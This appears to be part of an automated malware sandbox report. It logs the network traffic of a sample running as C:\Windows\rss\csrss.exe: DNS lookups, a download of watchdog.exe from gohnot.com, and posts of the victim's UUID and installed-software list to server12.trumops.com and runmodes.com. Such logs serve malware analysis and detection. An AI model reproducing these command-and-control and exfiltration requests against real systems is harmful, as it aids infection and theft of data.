                                                            Oct 20, 2021 12:39:11.941668987 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.941715956 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942187071 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942217112 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942240000 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942262888 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942287922 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942297935 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942311049 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942311049 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942332029 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942353964 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942375898 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942384005 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942399025 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942406893 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942421913 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942445040 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942452908 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942470074 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942481995 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942495108 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942516088 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942537069 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942538977 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942560911 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942581892 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.942583084 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.942630053 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944365978 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944387913 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944403887 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944420099 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944437027 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944457054 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944473982 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944478035 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944489956 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944493055 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944505930 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944539070 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944549084 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944555998 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944571972 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944576979 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944576979 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944597960 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944617987 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944617987 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944644928 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944664001 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944684982 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944689989 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944705963 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:11.944749117 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:11.944772005 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.076853037 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.092793941 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.092859983 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.092885017 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.092905998 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.092952967 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.092969894 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093013048 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093041897 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093065023 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093086958 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093110085 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093132973 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093142033 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093156099 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093170881 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093189001 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093211889 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093231916 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093256950 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093280077 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093302011 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093305111 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093324900 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093348026 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093369007 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093370914 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093393087 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093394041 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093415022 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093414068 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093436003 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093441010 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093465090 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093466043 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093487024 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093516111 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093538046 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093538046 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093560934 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093581915 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093597889 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093604088 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093621016 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093626976 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093653917 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093656063 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093688011 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093704939 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093734980 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.093950033 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.093967915 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094000101 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094017029 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094034910 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094052076 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094069004 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094085932 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094101906 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094119072 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094135046 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094151974 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094167948 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094185114 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094202042 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094219923 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094237089 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094254017 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094269991 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094288111 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094305038 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094321966 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094340086 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094906092 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094926119 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094942093 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094959974 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094976902 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.094994068 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095010042 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095027924 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095045090 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095062017 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095077038 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095094919 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095109940 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095144987 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095163107 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095180035 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095196962 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095213890 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095232010 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095247984 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095263958 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095279932 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095297098 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095887899 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095921040 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095937967 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095956087 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.095973015 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096299887 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096327066 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096349001 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096370935 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096375942 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096393108 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096414089 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096436024 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096457005 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096462011 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096482038 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096491098 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096504927 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096524954 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096548080 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096558094 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096569061 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096590996 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096600056 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096612930 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096632004 CEST4976780192.168.2.6104.21.92.165
                                                            Oct 20, 2021 12:39:12.096635103 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096658945 CEST8049767104.21.92.165192.168.2.6
                                                            Oct 20, 2021 12:39:12.096668959 CEST4976780192.168.2.6104.21.92.165

                                                            UDP Packets


                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 20, 2021 12:38:52.233896017 CEST | 192.168.2.6 | 8.8.8.8 | 0xb8d1 | Standard query (0) | trumops.com | 16 | IN (0x0001)
Oct 20, 2021 12:38:52.260442972 CEST | 192.168.2.6 | 8.8.8.8 | 0x2d77 | Standard query (0) | logs.trumops.com | 16 | IN (0x0001)
Oct 20, 2021 12:38:52.286421061 CEST | 192.168.2.6 | 8.8.8.8 | 0x6503 | Standard query (0) | 8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com | 16 | IN (0x0001)
Oct 20, 2021 12:38:52.349601030 CEST | 192.168.2.6 | 8.8.8.8 | 0xdba7 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:52.519624949 CEST | 192.168.2.6 | 8.8.8.8 | 0x9115 | Standard query (0) | server12.trumops.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:56.621659994 CEST | 192.168.2.6 | 8.8.8.8 | 0x4df5 | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:57.825361967 CEST | 192.168.2.6 | 8.8.8.8 | 0x38f3 | Standard query (0) | server12.trumops.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.577914953 CEST | 192.168.2.6 | 8.8.8.8 | 0xdf1c | Standard query (0) | server12.trumops.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.718786001 CEST | 192.168.2.6 | 8.8.8.8 | 0x6367 | Standard query (0) | gohnot.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:13.665689945 CEST | 192.168.2.6 | 8.8.8.8 | 0xe3f4 | Standard query (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | 16 | IN (0x0001)
Oct 20, 2021 12:39:18.899579048 CEST | 192.168.2.6 | 8.8.8.8 | 0x3dce | Standard query (0) | runmodes.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:42.796056032 CEST | 192.168.2.6 | 8.8.8.8 | 0x7ab0 | Standard query (0) | server12.trumops.com | A (IP address) | IN (0x0001)
Oct 20, 2021 12:41:01.037570953 CEST | 192.168.2.6 | 8.8.8.8 | 0x8871 | Standard query (0) | server12.trumops.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 20, 2021 12:38:52.254411936 CEST | 8.8.8.8 | 192.168.2.6 | 0xb8d1 | No error (0) | trumops.com | | | TXT (Text strings) | IN (0x0001)
Oct 20, 2021 12:38:52.281461000 CEST | 8.8.8.8 | 192.168.2.6 | 0x2d77 | No error (0) | logs.trumops.com | | | TXT (Text strings) | IN (0x0001)
Oct 20, 2021 12:38:52.309148073 CEST | 8.8.8.8 | 192.168.2.6 | 0x6503 | Name error (3) | 8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com | none | none | 16 | IN (0x0001)
Oct 20, 2021 12:38:52.370346069 CEST | 8.8.8.8 | 192.168.2.6 | 0xdba7 | No error (0) | runmodes.com | | 104.21.34.203 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:52.370346069 CEST | 8.8.8.8 | 192.168.2.6 | 0xdba7 | No error (0) | runmodes.com | | 172.67.207.136 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:52.538857937 CEST | 8.8.8.8 | 192.168.2.6 | 0x9115 | No error (0) | server12.trumops.com | | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:52.538857937 CEST | 8.8.8.8 | 192.168.2.6 | 0x9115 | No error (0) | server12.trumops.com | | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:56.639914036 CEST | 8.8.8.8 | 192.168.2.6 | 0x4df5 | No error (0) | runmodes.com | | 104.21.34.203 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:56.639914036 CEST | 8.8.8.8 | 192.168.2.6 | 0x4df5 | No error (0) | runmodes.com | | 172.67.207.136 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:57.846230030 CEST | 8.8.8.8 | 192.168.2.6 | 0x38f3 | No error (0) | server12.trumops.com | | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:38:57.846230030 CEST | 8.8.8.8 | 192.168.2.6 | 0x38f3 | No error (0) | server12.trumops.com | | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.599297047 CEST | 8.8.8.8 | 192.168.2.6 | 0xdf1c | No error (0) | server12.trumops.com | | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.599297047 CEST | 8.8.8.8 | 192.168.2.6 | 0xdf1c | No error (0) | server12.trumops.com | | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.736885071 CEST | 8.8.8.8 | 192.168.2.6 | 0x6367 | No error (0) | gohnot.com | | 104.21.92.165 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:11.736885071 CEST | 8.8.8.8 | 192.168.2.6 | 0x6367 | No error (0) | gohnot.com | | 172.67.196.11 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:13.686454058 CEST | 8.8.8.8 | 192.168.2.6 | 0xe3f4 | No error (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | | | TXT (Text strings) | IN (0x0001)
Oct 20, 2021 12:39:18.919198036 CEST | 8.8.8.8 | 192.168.2.6 | 0x3dce | No error (0) | runmodes.com | | 104.21.34.203 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:18.919198036 CEST | 8.8.8.8 | 192.168.2.6 | 0x3dce | No error (0) | runmodes.com | | 172.67.207.136 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:42.814599037 CEST | 8.8.8.8 | 192.168.2.6 | 0x7ab0 | No error (0) | server12.trumops.com | | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:39:42.814599037 CEST | 8.8.8.8 | 192.168.2.6 | 0x7ab0 | No error (0) | server12.trumops.com | | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:41:01.056124926 CEST | 8.8.8.8 | 192.168.2.6 | 0x8871 | No error (0) | server12.trumops.com | | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 20, 2021 12:41:01.056124926 CEST | 8.8.8.8 | 192.168.2.6 | 0x8871 | No error (0) | server12.trumops.com | | 104.21.79.9 | A (IP address) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • runmodes.com
                                                            • server12.trumops.com
                                                            • gohnot.com

                                                            HTTP Packets

                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            0           192.168.2.6  49754        104.21.34.203   443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            1           192.168.2.6  49755        104.21.79.9     443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            2           192.168.2.6  49756        104.21.34.203   443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            3           192.168.2.6  49757        172.67.139.144  443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            4           192.168.2.6  49764        172.67.139.144  443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            5           192.168.2.6  49768        104.21.34.203   443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            6           192.168.2.6  49771        172.67.139.144  443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            7           192.168.2.6  49855        172.67.139.144  443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            8           192.168.2.6  49767        104.21.92.165   80                C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data
                                                            Oct 20, 2021 12:39:11.755803108 CEST  1237  OUT  GET /0281c43f36eb9f47aab5357d48bbc076/watchdog.exe HTTP/1.1
                                                            Host: gohnot.com
                                                            User-Agent: Go-http-client/1.1
                                                            Uuid: 8cf49c60-c834-48e4-bacd-9cc30e6a4460
                                                            Version: 183
                                                            Accept-Encoding: gzip
                                                            Oct 20, 2021 12:39:11.789946079 CEST  1246  IN  HTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:11 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2102272
                                                            Connection: keep-alive
                                                            content-disposition: attachment; filename=watchdog.exe
                                                            etag: "616ea494-201400"
                                                            last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                            Cache-Control: max-age=3600
                                                            CF-Cache-Status: HIT
                                                            Age: 2344
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=um4jgmu5MJYrCALOja4WSnT%2BKIqMmUbFD6XsWL2Jk3lxPjw2VqysVmcC9mrM%2BGwFqp0T%2Bv78FIyQfHnQlthqFSIsBnaG1oJt9USn6g%2BEBiwQGd5bp0SiF0DtnQnx"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 6a119ef28d8f68f2-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Oct 20, 2021 12:39:42.113886118 CEST  3458  OUT  Data Raw: 00
                                                            Data Ascii:
                                                            Oct 20, 2021 12:40:12.146898985 CEST  10117  OUT  Data Raw: 00
                                                            Data Ascii:
                                                            Oct 20, 2021 12:40:42.173748970 CEST  10202  OUT  Data Raw: 00
                                                            Data Ascii:


                                                            HTTPS Proxied Packets

                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            0           192.168.2.6  49754        104.21.34.203   443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data
                                                            2021-10-20 10:38:52 UTC  0  OUT  POST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 144
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:52 UTC  0  IN  HTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:38:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IA3VAWpCIwmBdIRHXxFIkl5iFMPMygQ0fA2kQfeeZgpB%2FyobvqTBT4%2FyM9Ij0LGD7BUoxG5KiMuH62LtN96vARHMP%2FiALNudXv5DVyMM2FgpLXm21nDWMnWh0r%2F48eQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e79d9c85caa-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:52 UTC  1  IN  Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            1           192.168.2.6  49755        104.21.79.9     443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data
                                                            2021-10-20 10:38:52 UTC  1  OUT  POST /bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 18950
                                                            Content-Type: application/json; charset=UTF-8
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:52 UTC  1  OUT  Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft OneNote 2016 (KB4475586) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"
                                                            2021-10-20 10:38:52 UTC  2  OUT  Data Ascii: te":"20200723"},{"display_name":"Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_versio
